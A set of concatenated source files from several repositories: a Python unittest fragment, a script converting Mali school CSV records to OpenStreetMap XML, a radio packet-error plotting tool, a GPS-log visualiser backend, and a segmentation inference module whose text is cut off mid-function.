## Whatever goes here gets run after every test case
pass
# Note that
#
# "When you nest patch decorators the mocks are passed in to
# the decorated function in the same order they applied (the normal python
# order that decorators are applied). This means from the bottom up..."
#
# https://docs.python.org/3/library/unittest.mock.html
@patch('runme.StaticClass.staticMethodWithStringArg')
@patch('runme.InstanceClass')
def test_callStaticMethodWithStringArg(self, mockInstanceClass, mockStaticMethodWithStringArg):
instanceMock = Mock()
mockInstanceClass.return_value = instanceMock
runme.useBoth()
mockStaticMethodWithStringArg.assert_called_once_with("Hello Another World!")
instanceMock.someInstanceMethod.assert_called_once_with(11)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jokkolabs/mali_schools",
"score": 3
} |
#### File: jokkolabs/mali_schools/csv2osm.py
```python
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import sys
import os
import re
import datetime
import unicodecsv as csv
xml_head = ('<?xml version="1.0" encoding="UTF-8"?>\n'
'<osm version="0.6" generator="csv2osm.py">\n'
'<bounds minlat="{minlat}" minlon="{minlon}" '
'maxlat="{maxlat}" maxlon="{maxlon}"/>\n')
xml_tail = '</osm>\n'
node_tmpl = '<node id="{id}" version="1" changeset="{id}" ' \
'lat="{lat}" lon="{lon}" user="Open Data Mali" ' \
'uid="2306601" visible="true" timestamp="{timestamp}">\n' \
'{tags}\n' \
'</node>'
def getTag(key, value):
return '<tag k="{key}" v="{value}"/>'.format(key=key, value=value)
def getTags(**tags):
return "\n".join([getTag(key, value) for key, value in tags.items()])
def getTimestamp():
return datetime.datetime.now().isoformat().split('.')[0] + 'Z'
def yesno(cond):
return 'yes' if cond else 'no'
def clean(s):
return s.strip().replace('"', "'").replace('¨', 'è')
def cleanName(s):
s = clean(s)
def _cycle2(s):
marker = "[2ème C]"
patts = ["SECOND CYCLE",
"SECOND/ CYCLE",
"SECOND /CYCLE",
"SECOND-CYCLE",
"Second Cycle",
"DEUXIEME CYCLE",
"SEOND CYCLE",
"SEGOND CYCLE",
"2EM CYCLE",
"2è CYCLE",
"2 ème CYCLE",
"2EME CYCLE",
"2ème Cycle",
"2ème CYCLE",
"2 EME CYCLE",
"2è CYCEL",
"2e Cycle",
"2 CYCLE",
"2EM Cycle",
"2E CYCLE",
"2EME CYCLE",
"2 Cycle",
"2ème cycle",
"2éme CYCLE",
"2ème CYCLE",
"2 ème Cycle",
"2 ème cycle",
"2è cYCLE",
"2è CYCLE",
"2e cycle",
"2èmr CYCLE",
"2èmé Cycle",
"2èME CYCLE",
"2 è CYCLE",
"2em Cycle",
"2 è CYCLE",
"2eme cycle",
"2ième cycle",
"2è cycle",
"2CYCLE",
"2éme C.",
"2ème C",
"2eme C",
"2EME C",
"2ème C",
"2ème c",
"[[2ème C]]",
"2èmeC",
"2 ème",
"2e SC",
"2E c",
"2 è c",
"2 e C",
"2 E C",
"2è SC",
"2E C",
"2e C",
"2e C",
"2è C",
"2é C",
"2° C",
"2e C",
"2E C",
"2 è C",
"2 C",
"2°C",
"2èC",
"2eC",
"2Èc",
"2EC",
"2E",
"2C",
"2c",
"2é",
]
for index in range(0, len(patts)):
patt = patts[index]
if marker in s:
return s
s = s.replace(patt, marker)
return s
def _cycle1(s):
marker = "[1er C]"
patts = ["PREMIER CYCLE",
"PREMIER CYCLE",
"I ER CYCLE",
"I er CYCLE",
"[1er C]cycle",
"Ier Cycle",
"Ier CYCLE",
"1er CYCLE",
"1er CYCLE",
"1ER CYCLE",
"1er cycle",
"1èr CYCLE",
"1ERE CYCLE",
"1 e CYCLE",
"1 ER CYCLE",
"1 er cycle",
"1° CYCLE",
"1e CYCLE",
"1E CYLCE",
"1ér cycle",
"1e CYCLE",
"1° CYCLE",
"1ER CYCLE",
"1 CYCLE",
"1r Cycle",
"1ercycle",
"1ère cycle /",
"1cycle/",
"1Cycle",
"1 cycle",
"(1 er C)",
"1 er C",
"1er C",
"1ER C",
"1erC.",
"1erC",
"1ER C",
"1e C",
"1° C",
"1°C",
"1 C",
"1eC",
"1èC",
"1er",
"1C",
"1°",
]
for index in range(0, len(patts)):
patt = patts[index]
if marker in s:
return s
s = s.replace(patt, marker)
return s
def _franco(s):
return s.replace("<NAME>", "franco-arabe")
def _ecole(s):
return s.replace("ECOLE PRIVEE", "École privée") \
.replace("Ecole privée", "École privée") \
.replace("ECOLE DE BASE PRIVEE", "École de base privée") \
.replace("ECOLE PRIVE", "École privée") \
.replace("ECOL FOND. PRIVEE", "École fondamentale privée") \
.replace("Ecole", "École") \
.replace("ECOLES", "École") \
.replace("ECOLE", "École") \
.replace("COMMUNAUTAIRE", "communautaire") \
.replace("COOPERATIVE", "coopérative") \
.replace("PUBLIQUE", "publique") \
.replace("CATHOLIQUE", "catholique") \
.replace("FRANCO-ARABE", "franco-arabe") \
.replace("FONDAMENTALE DE", "fondamentale de") \
.replace("FONDAMENTALE", "fondamentale") \
.replace("FONDAMENTAL", "fondamentale") \
.replace("FOND ", "fondamentale ") \
.replace("MOBILE", "mobile") \
.replace("DES SOURDS-MUETS DE", "des sourds-muets de") \
.replace("SPECIALE", "spéciale") \
.replace(" DE ", " de ") \
.replace("PRIVEE", "École privée") \
.replace("PRIVE", "École privée")
def _special(s):
patts = [
(" (YOROSSO[2ème C])", ""),
]
for index in range(0, len(patts)):
patt = patts[index]
s = s.replace(patt[0], patt[1])
return s
def _spaces(s):
return re.sub(r'\s+', " ", s).replace("( ", "(").replace(" )", ")")
def _cap(s):
return s
s = _cycle1(s)
s = _cycle2(s)
s = _special(s)
s = _franco(s)
s = _spaces(s)
s = _ecole(s)
s = _cap(s)
return s
def getNode(entry, lnum):
# Schools are `1er cycle` or `2ème cycle`
cycle = 1 if entry.get('CYCLE') == "1er cycle" else 2
has_latrines = entry.get('PRESENCE_LATRINES') == '1'
# has_girl_latrines = entry.get('LATRINES_FILLES_SEPAREES') == '1'
nb_latrines = int(entry.get('NOMBRE_LATRINES')) \
if entry.get('NOMBRE_LATRINES') else 0
nb_teachers = int(entry.get('NBRE ENSEIGNANTS')) \
if entry.get('NBRE ENSEIGNANTS') else None
statuses = {
"Communautaire": "community",
"Medersa": "religious",
"Privé confessionnel": "religious",
"Privé laïc": "private",
"Public": "public"
}
water_options = {
"1) robinet ": "tap",
"2) forage fonctionnel": "working_drilling",
"3) puits non tarrissable": "inexhaustible_well",
"4) puits tarrissable": "exhaustible_well",
"5) pas de point d'eau": "no_water_point",
"indeterminé": "unknown",
"": "unknown"
}
water_point = water_options.get(entry.get('EAU_POTABLE'))
has_drinkable_water = water_point in [
'tap', 'working_drilling', 'inexhaustible_well', 'exhaustible_well']
# status are `Communautaire` or `Medersa` or `Privé confessionnel`
# or `Privé laïc` or `Public`
tags = {
'amenity': 'school',
'name': cleanName(entry.get('NOM_ETABLISSEMENT')),
'operator:type': statuses.get(entry.get('STATUT')),
'source': "UNICEF",
# school classification
'school:ML:academie': entry.get('AE'),
'school:ML:cap': entry.get('CAP'),
'isced:level': 1 if cycle == 1 else '2,3',
# 'school:first_cycle': yesno(cycle == 1),
# 'school:second_cycle': yesno(cycle == 2),
# Students
# 'school:nb_schoolboys_2012': int(entry.get('GARCONS')),
# 'school:nb_schoolgirls_2012': int(entry.get('FILLES')),
'capacity:pupils': int(entry.get('TOTAL')),
'drinking_water': yesno(has_drinkable_water),
'restaurant':
yesno(entry.get('PRESENCE_RESTAURANT') == '1'),
'toilets': yesno(has_latrines),
'toilets:number': nb_latrines,
}
# admin levels of Mali
# if entry.get('Région'):
# tags.update({'is_in:region': clean(entry.get('Région'))})
if entry.get('Cercle'):
tags.update({'is_in:cercle': clean(entry.get('Cercle'))})
if entry.get('Commune'):
tags.update({'is_in:commune': clean(entry.get('Commune'))})
if entry.get('Localites'):
tags.update({'is_in:village': clean(entry.get('Localites')),
'addr:city': clean(entry.get('Localites'))})
# School code
# if entry.get('CODE_ETABLISSEMENT'):
# tags.update({'school:ML:code': entry.get('CODE_ETABLISSEMENT')})
# if has_latrines:
# tags.update({'school:has_separated_girls_latrines':
# yesno(has_girl_latrines)})
if has_drinkable_water:
tags.update({'drinking_water:type': water_point})
tags.update({'drinking_water:seasonal':
yesno(water_point == 'exhaustible_well')})
if nb_teachers is not None:
tags.update({'capacity:teachers': nb_teachers})
data = {
'tags': getTags(**tags),
'id': -lnum,
'changeset': -lnum,
'lat': entry.get('Y'),
'lon': entry.get('X'),
'timestamp': getTimestamp()
}
return node_tmpl.format(**data)
def getBounds(nodes):
minlat = minlon = maxlat = maxlon = None
for node, node_latlon in nodes:
lat, lon = node_latlon
if lat > maxlat or maxlat is None:
maxlat = lat
if lat < minlat or minlat is None:
minlat = lat
if lon > maxlon or maxlon is None:
maxlon = lon
if lon < minlon or minlon is None:
minlon = lon
return minlat, minlon, maxlat, maxlon
def main(filename):
headers = ['Région', 'AE', 'CAP', 'Cercle', 'Commune',
'NOM_ETABLISSEMENT', 'Localites', 'X', 'Y',
'CODE_ETABLISSEMENT', 'Localisation', 'CYCLE',
'STATUT', 'PRESENCE_RESTAURANT', 'PRESENCE_LATRINES',
'LATRINES_FILLES_SEPAREES', 'NOMBRE_LATRINES',
'EAU_POTABLE', 'GARCONS', 'FILLES', 'TOTAL',
'NBRE ENSEIGNANTS']
folder = 'changesets'
input_csv_file = open(filename, 'r')
csv_reader = csv.DictReader(input_csv_file, fieldnames=headers)
# create changeset folder if exist
try:
os.mkdir(folder)
except:
pass
def write_file(academy, nodes):
print("Writting ACADEMIE {}/{}".format(academy, len(nodes)))
minlat, minlon, maxlat, maxlon = getBounds(nodes)
output_osm_file = open(os.path.join(folder,
'{}.osm'.format(academy)), 'w')
output_osm_file.write(xml_head.format(
minlat=minlat, minlon=minlon, maxlat=maxlat, maxlon=maxlon))
for node, node_latlon in nodes:
output_osm_file.write(node.encode('utf-8'))
output_osm_file.write('\n')
output_osm_file.write(xml_tail)
output_osm_file.close()
academies = {}
for entry in csv_reader:
if csv_reader.line_num == 1:
continue
# don't export data without coordinates
if not entry.get('X') or not entry.get('Y'):
continue
ac = clean(entry.get('AE')).replace(' ', '-')
if ac not in academies.keys():
academies[ac] = []
print(cleanName(entry.get('NOM_ETABLISSEMENT')))
school_node = getNode(entry, csv_reader.line_num)
school_latlon = (float(entry.get('Y')), float(entry.get('X')))
academies[ac].append((school_node, school_latlon))
input_csv_file.close()
for ac, nodes in academies.items():
write_file(ac, nodes)
print("Export complete.")
if __name__ == '__main__':
if len(sys.argv) < 2:
print("You must pass the MLI_schools.csv path")
sys.exit(1)
main(sys.argv[1])
``` |
{
"source": "Joklost/masters",
"score": 3
} |
#### File: tools/graphs/pep.py
```python
from typing import List
import math
THERMAL_NOISE = -119.66
NOISE_FIGURE = 4.2
def lin(log_):
return math.pow(10, log_ / 10)
def log(lin_):
return 10 * math.log10(lin_)
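# Note (assumed standard dBm/mW relationship, not stated in the original file):
# lin(x) = 10 ** (x / 10) maps dBm to mW and log(x) = 10 * log10(x) maps back, so
# pepe() below sums interference power in the linear domain before returning to dB.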
def pepe(rssi: float, packetsize: int, interference: List[float]):
p_n = lin(THERMAL_NOISE + NOISE_FIGURE)
p_i = 0.0
for rssi_i_db in interference:
p_i += lin(rssi_i_db)
p_ni = p_n + p_i
p_ni_db = log(p_ni)
snir_db = rssi - p_ni_db
snir = lin(snir_db)
bep = 0.5 * math.erfc(math.sqrt(snir / 2.0))
pep = 1.0 - math.pow(1.0 - bep, float(packetsize) * 8.0)
return pep
def main():
min = -112
max = -102
step = 0.1
curr = min
print('\\addplot[very thick, solid, cyan!50!black] coordinates {', end='')
while curr < max:
rssi = round(curr, 1)
pep = pepe(rssi, 20, [])
print(f'({rssi},{pep})', end='')
curr += step
print('};')
min = -70
max = -60
step = 0.1
curr = min
print('\\addplot[very thick, solid, cyan!50!black] coordinates {', end='')
while curr < max:
rssi = round(curr, 1)
pep = pepe(rssi, 20, [-74.042])
print(f'({rssi},{pep})', end='')
curr += step
print('};', end='')
if __name__ == '__main__':
main()
```
#### File: visualiser/backend/engine.py
```python
import glob
from subprocess import Popen, PIPE, STDOUT
import os
from backend.smc2py import parseEngineStdout
import math
import copy
# validate data and proxy to real functions
def execute(data):
models = list_models()['models']
if 'type' not in data:
return {'error': 'No type recieved'}
if data['type'] not in ['log', 'log+rssi']:
if 'model' not in data:
return {'error': 'No Model received'}
if data['model'] not in models:
return {'error': 'Model not available: ' + data['model'] + " use one of " + str(models)}
if data['type'] == 'static':
if 'topology' in data:
if data['topology'] == 'grid':
if 'number_of_nodes' in data and 'node_init_time' in data and 'duration' in data:
nn = 0
it = 0
dur = 0
try:
nn = int(data['number_of_nodes'])
except Exception:
{'error': "number_of_nodes is not a number"}
try:
it = int(data['node_init_time'])
except Exception:
{'error': "node_init_time is not a number"}
try:
dur = int(data['duration'])
except Exception:
{'error': "duration is not a number"}
return run_static_grid(data['model'], nn, it, dur)
else:
return {'error': 'Missing arguments for simulation'}
else:
return {'error': 'Unknown topology'}
else:
return {'error': "No topology received"}
error, parsed, edges = None, None, None
if data['type'] in ['gps', 'log', 'log+rssi']:
if 'gps_data' not in data:
return {'error': "No GPS-log"}
if data['type'] == 'log+rssi':
error, parsed, edges = parse_gps(data['gps_data'], with_rssi=True)
else:
error, parsed, edges = parse_gps(data['gps_data'])
if error is not None:
return error
if data['type'] in ['log', 'log+rssi']:
return run_log(0, -1, parsed, edges)
if data['type'] == 'gps':
fdur = 0
tdur = -1
if 'from_duration' in data and len(data['from_duration'].strip()) > 0:
try:
fdur = int(data['from_duration'])
except Exception:
return {'error': "from_duration is not a number"}
if 'to_duration' in data and len(data['to_duration'].strip()) > 0:
try:
tdur = int(data['to_duration'])
except Exception:
return {'error': "to_duration is not a number"}
return run_gps(fdur, tdur, parsed)
return {'error': "Unknown type or topology"}
def parse_gps(data, with_rssi: bool = False):
raw = data.splitlines()
parsed = []
edges = {} if with_rssi else None
for i in range(len(raw)):
if '#' in raw[i] or not raw[i].strip():
continue
entry = raw[i].split(",")
if entry[-1] == "":
del entry[-1]
if len(entry) < 4:
return file_error(i, 'less than four entries'), None, None
id = 0
lat = 0
lng = 0
ts = 0
try:
id = int(entry[0])
except Exception:
return file_error(i, 'entry 0 is not an id'), None, None
if id < 0:
return file_error(i, 'entry 0 is not an id'), None, None
try:
lat = float(entry[1])
except Exception:
return file_error(i, 'entry 0 is not a latitude'), None, None
if lat < -90 or lat > 90:
return file_error(i, 'entry 0 is not a latitude'), None, None
try:
lng = float(entry[2])
except Exception:
return file_error(i, 'entry 0 is not a latitude'), None, None
if lng < -180 or lng > 180:
return file_error(i, 'entry 0 is not a latitude'), None, None
try:
ts = float(entry[3])
except Exception:
return file_error(i, 'entry 3 is not a timestamp'), None, None
if ts < 0:
return file_error(i, 'entry 3 is not a timestamp'), None, None
# if log contains rssi values
if with_rssi:
for j in range(5, len(entry), 2):
if id not in edges:
edges[id] = {}
if ts not in edges[id]:
edges[id][ts] = {}
edges[id][ts][int(entry[j - 1])] = entry[j]
parsed.append((id, lat, lng, ts))
return None, parsed, edges
def file_error(line, message):
return {'error': 'Line ' + str(line) + ' - ' + message}
model_folder = "backend/models/"
def list_models():
res = []
postfix = ".xml"
for file in glob.glob(model_folder + "/*" + postfix):
model = str(file)
res.append(model[len(model_folder): - len(postfix)])
return {"models": res}
def get_id(data, first):
last = first
while data[last] != ']':
last += 1
return (data[first: last], last)
def run_static_grid(model, num_nodes, init_time, duration):
if num_nodes <= 0:
return {'error': 'Expected at least one node'}
if num_nodes >= 10000:
return {'error': 'Expected less than 10000 nodes'}
if init_time < 0:
return {'error': 'Expected at least some init time'}
if init_time >= duration:
return {'error': 'Expected duration to be larger than init_time'}
path = model_folder + "/" + model + ".xml"
if not os.path.isfile(path):
return {'error': 'Could not find ' + str(path)}
p = Popen(['verifyta', "-W", "-s", path], stdout=PIPE, stdin=PIPE, stderr=PIPE, universal_newlines=True)
lines = str(duration) + " " + str(num_nodes) + " "
for n in range(num_nodes):
lines += str(0) + " "
lines += str(init_time) + " "
lines += str(duration) + " "
(stdout, stderr) = p.communicate(input=lines)
data = parseEngineStdout(stdout)
minlat = 57.013219
minlng = 9.991016
maxlat = 57.017997
maxlng = 10.001937
nodes = {}
square = int(math.sqrt(num_nodes))
dlat = (maxlat - minlat) / square
dlon = (maxlng - minlng) / square
maxlat = minlat
maxlng = minlng
for i in range(num_nodes):
lat = minlat + int(i / square) * dlat
lng = minlng + int(i % square) * dlon
maxlat = max(maxlat, lat)
maxlng = max(maxlng, lng)
fields = data[0].variables()
no = 0
edges = {}
for field in fields:
raw = data[0].raw(no)
if field[7] == 'N': # OUTPUT_NODES[
(id, last) = get_id(field, 12)
lat = minlat + int(int(id) / square) * dlat
lng = minlng + int(int(id) % square) * dlon
maxlat = max(maxlat, lat)
maxlng = max(maxlng, lng)
field = field[last + 2:]
if id not in nodes:
nodes[id] = []
num = 0
lastval = 0
for (ts, val) in raw:
while num < len(nodes[id]) and nodes[id][num]['timestamp'] < ts:
if num is not 0:
nodes[id][num][field] = lastval
num += 1
lastval = val
if num == len(nodes[id]) and num == 0:
nodes[id].append({'lat': lat, 'lng': lng, 'timestamp': ts, field: val})
elif num < len(nodes[id]) and nodes[id][num]['timestamp'] == ts:
nodes[id][num][field] = val
else:
nodes[id].insert(num, copy.deepcopy(nodes[id][num - 1]))
nodes[id][num][field] = val
nodes[id][num]['timestamp'] = ts
elif field[7] == 'E': # OUTPUT_EDGE[
(id, last) = get_id(field, 12)
(oid, last) = get_id(field, last + 2)
if id == oid:
no += 1
continue
field = field[last + 2:]
if id not in edges:
edges[id] = {}
if oid not in edges[id]:
edges[id][oid] = []
num = 0
lastval = 0
for (ts, val) in raw:
while num < len(edges[id][oid]) and edges[id][oid][num]['timestamp'] < ts:
                    if num != 0:
edges[id][oid][num][field] = lastval
num += 1
lastval = val
if num == len(edges[id][oid]) and num == 0:
edges[id][oid].append({'timestamp': ts, field: val, 'dest': int(oid)})
elif num < len(edges[id][oid]) and edges[id][oid][num]['timestamp'] == ts:
edges[id][oid][num][field] = val
else:
edges[id][oid].insert(num, copy.deepcopy(edges[id][oid][num - 1]))
edges[id][oid][num][field] = val
edges[id][oid][num]['timestamp'] = ts
no += 1
for n in nodes:
if nodes[n][-1]['timestamp'] != duration:
nodes[n].append(copy.deepcopy(nodes[n][-1]))
nodes[n][-1]['timestamp'] = duration
for n in edges:
for n2 in edges[n]:
if edges[n][n2][-1]['timestamp'] != duration:
edges[n][n2].append(copy.deepcopy(edges[n][n2][-1]))
edges[n][n2][-1]['timestamp'] = duration
return {'nodes': nodes, 'edges': edges, 'min_lat': minlat, 'max_lat': maxlat, 'min_lng': minlng, 'max_lng': maxlng,
'first_time': 0, 'last_time': duration}
def run_gps(fdur, tdur, data):
    if tdur != -1 and tdur <= fdur:
        return {'error': 'From duration should be smaller than to duration (' + str(fdur) + ", " + str(tdur) + ")"}
    return {'error': 'Not yet implemented'}
def run_log(fdur, tdur, data, log_edges):
    if tdur != -1 and tdur <= fdur:
        return {'error': 'From duration should be smaller than to duration (' + str(fdur) + ", " + str(tdur) + ")"}
nodes = {}
edges = {}
minlat = math.inf
maxlat = -math.inf
minlng = math.inf
maxlng = -math.inf
mints = math.inf
maxts = -math.inf
for row in data:
nd = {'lat': row[1], 'lng': row[2], 'timestamp': row[3]}
        if row[3] < fdur or (tdur != -1 and row[3] > tdur):
continue
if row[0] not in nodes:
nodes[row[0]] = [nd]
else:
nodes[row[0]].append(nd)
minlat = min(minlat, row[1])
maxlat = max(maxlat, row[1])
minlng = min(minlng, row[2])
maxlng = max(maxlng, row[2])
mints = min(mints, row[3])
maxts = max(maxts, row[3])
if len(nodes) == 0:
return {'error': 'No nodes within the duration (or file is empty or could not be parsed)'}
for key in nodes:
nodes[key].sort(key=lambda el: el['timestamp'])
if log_edges is None:
for id in nodes:
for step in nodes[id]:
for other in nodes:
if (id == other
or nodes[other][0]['timestamp'] > step['timestamp']
or nodes[other][-1]['timestamp'] < step['timestamp']):
continue
nd = {'timestamp': step['timestamp'], 'dest': other}
if id not in edges:
edges[id] = {}
if other not in edges[id]:
edges[id][other] = []
edges[id][other].append(nd)
else:
if len(log_edges) == 0:
return {'error': "Log does not contain rssi measurements"}
for nid in nodes.keys():
for node in nodes[nid]:
for nid2 in nodes:
if nid == nid2:
continue
if (node['timestamp'] in log_edges[nid]
and node['timestamp'] in log_edges[nid2]
and nid2 in log_edges[nid][node['timestamp']]
and nid in log_edges[nid2][node['timestamp']]):
nd = {'timestamp': node['timestamp'], 'dest': nid2,
'rssi': int(log_edges[nid][node['timestamp']][nid2])}
nd2 = {'timestamp': node['timestamp'], 'dest': nid,
'rssi': int(log_edges[nid2][node['timestamp']][nid])}
if nid not in edges:
edges[nid] = {}
if nid2 not in edges:
edges[nid2] = {}
if nid not in edges[nid2]:
edges[nid2][nid] = []
if nid2 not in edges[nid]:
edges[nid][nid2] = []
edges[nid][nid2].append(nd)
edges[nid2][nid].append(nd2)
for key in edges:
for k2 in edges[key]:
edges[key][k2].sort(key=lambda el: el['timestamp'])
return {'nodes': nodes, 'edges': edges, 'min_lat': minlat, 'max_lat': maxlat, 'min_lng': minlng,
'max_lng': maxlng,
'first_time': mints, 'last_time': maxts}
``` |
{
"source": "Jokoe66/mseg-semantic",
"score": 2
} |
#### File: mseg_semantic/tool/inference_task.py
```python
import cv2
import imageio
import logging
import numpy as np
import os
from pathlib import Path
import pdb
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data
import torch.backends.cudnn as cudnn
from typing import List, Tuple
import tqdm
import mmcv
from mseg.utils.dir_utils import check_mkdir, create_leading_fpath_dirs
from mseg.utils.names_utils import get_universal_class_names
from mseg.utils.mask_utils_detectron2 import Visualizer
from mseg.utils.resize_util import resize_img_by_short_side
from mseg.taxonomy.taxonomy_converter import TaxonomyConverter
from mseg.taxonomy.naive_taxonomy_converter import NaiveTaxonomyConverter
from mseg_semantic.model.pspnet import PSPNet
from mseg_semantic.utils.avg_meter import AverageMeter
from mseg_semantic.utils.normalization_utils import (
get_imagenet_mean_std,
normalize_img
)
from mseg_semantic.utils.cv2_video_utils import VideoWriter, VideoReader
from mseg_semantic.utils import dataset, transform, config
from mseg_semantic.utils.img_path_utils import dump_relpath_txt
"""
Given a specified task, run inference on it using a pre-trained network.
Used for demos, and for testing on an evaluation dataset.
If projecting universal taxonomy into a different evaluation taxonomy,
the argmax comes *after* the linear mapping, so that probabilities can be
summed first.
Note: "base size" should be the length of the shorter side of the desired
inference image resolution. Note that the official PSPNet repo
(https://github.com/hszhao/semseg/blob/master/tool/test.py) treats
base_size as the longer side, which we found less intuitive given
screen resolution is generally described by shorter side length.
"base_size" is a very important parameter and will
affect results significantly.
"""
_ROOT = Path(__file__).resolve().parent.parent.parent
def get_logger():
"""
"""
logger_name = "main-logger"
logger = logging.getLogger(logger_name)
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
fmt = "[%(asctime)s %(levelname)s %(filename)s line %(lineno)d %(process)d] %(message)s"
handler.setFormatter(logging.Formatter(fmt))
logger.addHandler(handler)
return logger
logger = get_logger()
def get_unique_stem_from_last_k_strs(fpath: str, k: int = 4) -> str:
"""
Args:
- fpath
- k
Returns:
- unique_stem: string
"""
    parts = Path(fpath).parts
    unique_stem = '_'.join(parts[-k:-1]) + '_' + Path(fpath).stem
return unique_stem
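# Example (hypothetical path): get_unique_stem_from_last_k_strs('/data/coco/images/val/img1.jpg')
# returns 'coco_images_val_img1', i.e. the last parent directories joined with the file stem.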
class ToFlatLabel(object):
def __init__(self, tc_init, dataset):
self.dataset = dataset
self.tc = tc_init
def __call__(self, image, label):
return image, self.tc.transform_label(label, self.dataset)
def resize_by_scaled_short_side(
image: np.ndarray,
base_size: int,
scale: float
) -> np.ndarray:
"""
Args:
- image: Numpy array of shape ()
- scale:
Returns:
- image_scale:
"""
h, w, _ = image.shape
short_size = round(scale * base_size)
new_h = short_size
new_w = short_size
# Preserve the aspect ratio
if h > w:
new_h = round(short_size/float(w)*h)
else:
new_w = round(short_size/float(h)*w)
image_scale = cv2.resize(image, (new_w, new_h), interpolation=cv2.INTER_LINEAR)
return image_scale
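# Worked example (values chosen for illustration):
#   >>> resize_by_scaled_short_side(np.zeros((480, 640, 3), np.float32), base_size=360, scale=1.0).shape
#   (360, 480, 3)
# h < w here, so the height becomes 360 and the width is scaled to round(360 / 480 * 640) = 480.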
def pad_to_crop_sz(
image: np.ndarray,
crop_h: int,
crop_w: int,
mean: Tuple[float,float,float]
) -> Tuple[np.ndarray,int,int]:
"""
Network input should be at least crop size, so we pad using mean values if
provided image is too small. No rescaling is performed here.
We use cv2.copyMakeBorder to copy the source image into the middle of a
destination image. The areas to the left, to the right, above and below the
copied source image will be filled with extrapolated pixels, in this case the
provided mean pixel intensity.
Args:
- image:
- crop_h: integer representing crop height
- crop_w: integer representing crop width
Returns:
- image: Numpy array of shape (crop_h x crop_w) representing a
square image, with short side of square is at least crop size.
- pad_h_half: half the number of pixels used as padding along height dim
    - pad_w_half: half the number of pixels used as padding along width dim
"""
ori_h, ori_w, _ = image.shape
pad_h = max(crop_h - ori_h, 0)
pad_w = max(crop_w - ori_w, 0)
pad_h_half = int(pad_h / 2)
pad_w_half = int(pad_w / 2)
if pad_h > 0 or pad_w > 0:
image = cv2.copyMakeBorder(
src=image,
top=pad_h_half,
bottom=pad_h - pad_h_half,
left=pad_w_half,
right=pad_w - pad_w_half,
borderType=cv2.BORDER_CONSTANT,
value=mean
)
return image, pad_h_half, pad_w_half
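# Worked example (values chosen for illustration): padding a 300x400 image to a 473x473 crop
# gives pad_h = 173 and pad_w = 73, i.e. pad_h_half = 86 and pad_w_half = 36, so the source
# image ends up centered in a 473x473 canvas filled with the mean pixel value.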
def imread_rgb(img_fpath: str) -> np.ndarray:
"""
Returns:
- RGB 3 channel nd-array with shape H * W * 3
"""
bgr_img = cv2.imread(img_fpath, cv2.IMREAD_COLOR)
rgb_img = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2RGB)
rgb_img = np.float32(rgb_img)
return rgb_img
class InferenceTask:
def __init__(self,
args,
base_size: int,
crop_h: int,
crop_w: int,
input_file: str,
output_taxonomy: str,
scales: List[float],
use_gpu: bool = True
):
"""
We always use the ImageNet mean and standard deviation for normalization.
mean: 3-tuple of floats, representing pixel mean value
std: 3-tuple of floats, representing pixel standard deviation
'args' should contain at least two fields (shown below).
Args:
- args:
- base_size:
- crop_h: integer representing crop height, e.g. 473
- crop_w: integer representing crop width, e.g. 473
- input_file: could be absolute path to .txt file, .mp4 file,
or to a directory full of jpg images
- output_taxonomy
- scales
- use_gpu
"""
self.args = args
assert isinstance(self.args.img_name_unique, bool)
assert isinstance(self.args.print_freq, int)
assert isinstance(self.args.num_model_classes, int)
assert isinstance(self.args.model_path, str)
self.pred_dim = self.args.num_model_classes
self.base_size = base_size
self.crop_h = crop_h
self.crop_w = crop_w
self.input_file = input_file
self.output_taxonomy = output_taxonomy
self.scales = scales
self.use_gpu = use_gpu
self.mean, self.std = get_imagenet_mean_std()
self.model = self.load_model(args)
self.softmax = nn.Softmax(dim=1)
self.gray_folder = None # optional, intended for dataloader use
self.data_list = None # optional, intended for dataloader use
if self.output_taxonomy != 'universal':
assert isinstance(self.args.dataset, str)
self.dataset_name = args.dataset
self.tc = TaxonomyConverter()
if self.args.arch == 'psp':
assert isinstance(self.args.zoom_factor, int)
assert isinstance(self.args.network_name, int)
self.id_to_class_name_map = {
i: classname for i, classname in enumerate(get_universal_class_names())
}
# indicate which scales were used to make predictions
# (multi-scale vs. single-scale)
self.scales_str = 'ms' if len(args.scales) > 1 else 'ss'
def load_model(self, args):
"""
Load Pytorch pre-trained model from disk of type
torch.nn.DataParallel. Note that
`args.num_model_classes` will be size of logits output.
Args:
- args:
Returns:
- model
"""
if args.arch == 'psp':
model = PSPNet(
layers=args.layers,
classes=args.num_model_classes,
zoom_factor=args.zoom_factor,
pretrained=False,
network_name=args.network_name
)
elif args.arch == 'hrnet':
from mseg_semantic.model.seg_hrnet import get_configured_hrnet
# note apex batchnorm is hardcoded
model = get_configured_hrnet(args.num_model_classes, load_imagenet_model=False)
elif args.arch == 'hrnet_ocr':
from mseg_semantic.model.seg_hrnet_ocr import get_configured_hrnet_ocr
model = get_configured_hrnet_ocr(args.num_model_classes)
# logger.info(model)
model = torch.nn.DataParallel(model)
if self.use_gpu:
model = model.cuda()
cudnn.benchmark = True
if os.path.isfile(args.model_path):
logger.info(f"=> loading checkpoint '{args.model_path}'")
if self.use_gpu:
checkpoint = torch.load(args.model_path)
else:
checkpoint = torch.load(args.model_path, map_location='cpu')
model.load_state_dict(checkpoint['state_dict'], strict=False)
logger.info(f"=> loaded checkpoint '{args.model_path}'")
else:
raise RuntimeError(f"=> no checkpoint found at '{args.model_path}'")
return model
def execute(self) -> None:
"""
        Execute the demo, i.e. feed all of the desired input through the
        network and obtain predictions. Gracefully handles a single image,
        a directory of images, a video file (.mp4 etc.), or an evaluation dataset.
"""
logger.info('>>>>>>>>>>>>>>>> Start inference task >>>>>>>>>>>>>>>>')
self.model.eval()
suffix = self.input_file[-4:]
is_dir = os.path.isdir(self.input_file)
is_img = suffix in ['.png', '.jpg']
is_vid = suffix in ['.mp4', '.avi', '.mov']
if is_img:
self.render_single_img_pred()
elif is_dir:
# argument is a path to a directory
self.create_path_lists_from_dir()
test_loader = self.create_test_loader()
self.execute_on_dataloader(test_loader)
elif is_vid:
# argument is a video
self.execute_on_video()
elif not is_dir and not is_img and self.args.dataset != 'default':
# evaluate on a train or test dataset
test_loader = self.create_test_loader()
self.execute_on_dataloader(test_loader)
else:
logger.info('Error: Unknown input type')
logger.info('<<<<<<<<<<<<<<<<< Inference task completed <<<<<<<<<<<<<<<<<')
def render_single_img_pred(self, min_resolution: int = 1080):
"""
